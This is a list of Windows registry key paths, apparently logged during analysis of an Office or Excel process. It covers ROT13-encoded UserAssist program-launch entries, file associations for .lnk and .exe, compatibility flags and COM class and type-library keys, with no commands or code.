HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{ONOQ396S-678O-34OS-52P2-4PNQSSOO0700}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15962175-7QSP-O1Q7-O0Q1-RO4P08SSQ754}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{3818ONN3-5SS0-P4O9-1NQO-POO62S590N99}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\JvaENE\JvaENE.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P0O8063P-2P2Q-P9S3-1QN6-R758P4PNN4QP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\7-Mvc\7mSZ.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO348N20-771Q-3OR7-Q24R-8O5966Q59R06}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{750393P8-PN7R-N272-947O-NRON67O060PS}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{935761S8-94R4-SSN7-N8P0-S1NO2PQRP750}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{RQ4OQ59Q-OS0S-R631-89R9-2890450O9R8O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7884N773-3177-5577-06RP-940R17N8S359}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\NhgbUbgxrl\NhgbUbgxrl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\NhgbUbgxrl\Pbzcvyre\Nux2Rkr.rkr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\NoStartPageAppUserModelIDs
HKEY_CLASSES_ROOT\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\excel.exe\
HKEY_CURRENT_USER\Software\Classes\Applications\excel.exe
HKEY_CLASSES_ROOT\.lnk
HKEY_CURRENT_USER\Software\Classes\.lnk
HKEY_CLASSES_ROOT\.lnk\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\UserChoice
HKEY_CLASSES_ROOT\lnkfile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_CURRENT_USER\Software\Classes\lnkfile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\lnkfile\shellex\IconHandler
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\CLSID\{00021401-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{00021401-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\.EXE
HKEY_CURRENT_USER\Software\Classes\.exe
HKEY_CLASSES_ROOT\.EXE\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.EXE\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_CURRENT_USER\Software\Classes\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E2-0000-0000-C000-000000000046}
